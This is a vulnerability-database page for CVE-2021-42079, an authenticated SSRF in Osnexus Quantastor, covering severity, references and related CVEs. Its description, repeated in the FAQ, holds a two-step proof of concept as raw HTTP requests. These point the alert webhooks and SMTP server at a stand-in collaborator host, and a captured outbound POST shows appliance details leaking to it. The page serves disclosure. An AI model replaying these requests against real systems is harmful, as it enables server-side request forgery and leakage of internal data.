CVE-2021-42079
CVE-2021-42079 is a medium-severity vulnerability in Osnexus Quantastor with a CVSS 3.x base score of 6.2. It is not currently listed as actively exploited by CISA, and its EPSS exploit-prediction score is low. The underlying weakness is classified as CWE-918.
Key facts
- Severity: Medium (CVSS 3.x base score 6.2)
- EPSS exploit prediction: 1% (43rd percentile)
- Actively exploited: Not listed in CISA KEV
- Weakness: CWE-918
- Affected product: Osnexus Quantastor
- Published:
- Last modified:
Description
An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests. POC Step 1: Prepare the SSRF with a request like this: GET /qstorapi/alertConfigSet?senderEmailAddress=a&smtpServerIpAddress=BURPCOLLABHOST&smtpServerPort=25&smtpUsername=a&smtpPassword=1&smtpAuthType=1&customerSupportEmailAddress=1&poolFreeSpaceWarningThreshold=1&poolFreeSpaceAlertThreshold=1&poolFreeSpaceCriticalAlertThreshold=1&pagerDutyServiceKey=1&slackWebhookUrl=http://<target>&enableAlertTypes&enableAlertTypes=1&disableAlertTypes=1&pauseAlertTypes=1&mattermostWebhookUrl=http://<TARGET> HTTP/1.1 Host: <HOSTNAME> Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Connection: close authorization: Basic <BASIC_AUTH_HASH> Content-Type: application/json Content-Length: 0 Step 2: Trigger this alert with this request GET /qstorapi/alertRaise?title=test&message=test&severity=1 HTTP/1.1 Host: <HOSTNAME> Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Connection: close authorization: Basic <BASIC_AUTH_HASH> Content-Type: application/json Content-Length: 1 The post request received by <TARGET> looks like this: { ### Python FLASK stuff #### 'endpoint': 'index', 'method': 'POST', 'cookies': ImmutableMultiDict([]), ### END Python FLASK stuff #### 'data': b'{ "attachments": [ { "fallback": "[122] test / test.", "color": "#aa2222", "title": "[122] test", "text": "test", "fields": [ { "title": "Alert Severity", "value": "CRITICAL", "short": false }, { "title": "Appliance", "value": "quantastor (https://<HOSTNAME>)", "short": true }, { "title": "System / Driver / Kernel Ver", "value": "5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic", "short": false }, { "title": "System Startup", "value": "Fri Aug 6 16-02-55 2021", "short": true }, { "title": "SSID", "value": "f4823762-1dd1-1333-47a0-6238c474a7e7", "short": true }, ], "footer": "QuantaStor Call-home Alert", "footer_icon": " https://platform.slack-edge.com/img/default_application_icon.png ", "ts": 1628461774 } ], "mrkdwn":true }', #### FLASK REQUEST STUFF ##### 'headers': { 'Host': '<redacted>', 'User-Agent': 'curl/7.58.0', 'Accept': '*/*', 'Content-Type': 'application/json', 'Content-Length': '790' }, 'args': ImmutableMultiDict([]), 'form': ImmutableMultiDict([]), 'remote_addr': '217.103.63.173', 'path': '/payload/58', 'whois_ip': 'TNF-AS, NL' } #### END FLASK REQUEST STUFF #####
Frequently asked questions
- What is CVE-2021-42079?
- An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests. POC Step 1: Prepare the SSRF with a request like this: GET /qstorapi/alertConfigSet?senderEmailAddress=a&smtpServerIpAddress=BURPCOLLABHOST&smtpServerPort=25&smtpUsername=a&smtpPassword=1&smtpAuthType=1&customerSupportEmailAddress=1&poolFreeSpaceWarningThreshold=1&poolFreeSpaceAlertThreshold=1&poolFreeSpaceCriticalAlertThreshold=1&pagerDutyServiceKey=1&slackWebhookUrl=http://<target>&enableAlertTypes&enableAlertTypes=1&disableAlertTypes=1&pauseAlertTypes=1&mattermostWebhookUrl=http://<TARGET> HTTP/1.1 Host: <HOSTNAME> Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Connection: close authorization: Basic <BASIC_AUTH_HASH> Content-Type: application/json Content-Length: 0 Step 2: Trigger this alert with this request GET /qstorapi/alertRaise?title=test&message=test&severity=1 HTTP/1.1 Host: <HOSTNAME> Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Connection: close authorization: Basic <BASIC_AUTH_HASH> Content-Type: application/json Content-Length: 1 The post request received by <TARGET> looks like this: { ### Python FLASK stuff #### 'endpoint': 'index', 'method': 'POST', 'cookies': ImmutableMultiDict([]), ### END Python FLASK stuff #### 'data': b'{ "attachments": [ { "fallback": "[122] test / test.", "color": "#aa2222", "title": "[122] test", "text": "test", "fields": [ { "title": "Alert Severity", "value": "CRITICAL", "short": false }, { "title": "Appliance", "value": "quantastor (https://<HOSTNAME>)", "short": true }, { "title": "System / Driver / Kernel Ver", "value": "5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic", "short": false }, { "title": "System Startup", "value": "Fri Aug 6 16-02-55 2021", "short": true }, { "title": "SSID", "value": "f4823762-1dd1-1333-47a0-6238c474a7e7", "short": true }, ], "footer": "QuantaStor Call-home Alert", "footer_icon": " https://platform.slack-edge.com/img/default_application_icon.png ", "ts": 1628461774 } ], "mrkdwn":true }', #### FLASK REQUEST STUFF ##### 'headers': { 'Host': '<redacted>', 'User-Agent': 'curl/7.58.0', 'Accept': '*/*', 'Content-Type': 'application/json', 'Content-Length': '790' }, 'args': ImmutableMultiDict([]), 'form': ImmutableMultiDict([]), 'remote_addr': '217.103.63.173', 'path': '/payload/58', 'whois_ip': 'TNF-AS, NL' } #### END FLASK REQUEST STUFF #####
- How severe is CVE-2021-42079?
- CVE-2021-42079 has a CVSS 3.x base score of 6.2, rated medium severity. It is exploitable over network with low attack complexity, requires high privileges and user interaction. Impact on confidentiality is high, integrity none, and availability none.
- Is CVE-2021-42079 being actively exploited?
- It is not currently listed in CISA's KEV catalog. Its EPSS exploit-prediction score is 1% (43rd percentile), an estimate of the probability of exploitation in the next 30 days.
- What products are affected by CVE-2021-42079?
- CVE-2021-42079 affects Osnexus Quantastor. See the affected-products list for the exact vulnerable versions.
- How do I fix CVE-2021-42079?
- Review the linked vendor and NVD advisories for patched versions and mitigations, then upgrade or apply the recommended workaround.
- When was CVE-2021-42079 published?
- CVE-2021-42079 was published on 2023-07-10 and last updated on 2026-06-17.
References
- https://cisrt.divd.nl/DIVD-2021-00020/
- https://csirt.divd.nl/CVE-2021-42079
- https://www.osnexus.com/products/software-defined-storage
- https://www.wbsec.nl/osnexus
- https://www.divd.nl/DIVD-2021-00020
Affected products (1)
- cpe:2.3:a:osnexus:quantastor:*:*:*:*:*:*:*:*
More vulnerabilities in Osnexus Quantastor
- CVE-2021-4406 — Critical (CVSS 9.1): An authenticated attacker is able to create alerts that trigger a stored XSS attack. POC * go to the alert…
- CVE-2021-42081 — Critical (CVSS 9.1): An authenticated administrator is allowed to remotely execute arbitrary shell commands via the…
- CVE-2021-42083 — High (CVSS 8.7): An authenticated attacker is able to create alerts that trigger a stored XSS attack. POC * go to the alert…
- CVE-2021-42082 — High (CVSS 7.8): Local users are able to execute scripts under root privileges. POC On the local host run the following command: curl…
- CVE-2021-42080 — High (CVSS 7.4): An attacker is able to launch a Reflected XSS attack using a crafted URL. POC: Visit the following…
- CVE-2017-9979 — Medium (CVSS 6.1): On the OSNEXUS QuantaStor v4 virtual appliance before 4.3.1, if the REST call invoked does not exist, an error will be…
All CVEs affecting Osnexus Quantastor →
Other CWE-918 (Server-Side Request Forgery (SSRF)) vulnerabilities
- CVE-2026-47938 — Critical (CVSS 10.0): Adobe Campaign Classic (ACC) versions 7.4.3 build 9394 and earlier are affected by a Server-Side Request Forgery (SSRF)…
- CVE-2026-35431 — Critical (CVSS 10.0): Server-side request forgery (ssrf) in Microsoft Entra ID Entitlement Management allows an unauthorized attacker to…
- CVE-2026-32186 — Critical (CVSS 10.0): Server-side request forgery (ssrf) in Microsoft Bing allows an unauthorized attacker to elevate privileges over a…
- CVE-2026-33107 — Critical (CVSS 10.0): Server-side request forgery (ssrf) in Azure Databricks allows an unauthorized attacker to elevate privileges over a…
- CVE-2026-32871 — Critical (CVSS 10.0): FastMCP is a Pythonic way to build MCP servers and clients. Prior to version 3.2.0, the OpenAPIProvider in FastMCP…
- CVE-2026-32169 — Critical (CVSS 10.0): Server-side request forgery (ssrf) in Azure Cloud Shell allows an unauthorized attacker to elevate privileges over a…
Browse all CWE-918 (Server-Side Request Forgery (SSRF)) vulnerabilities →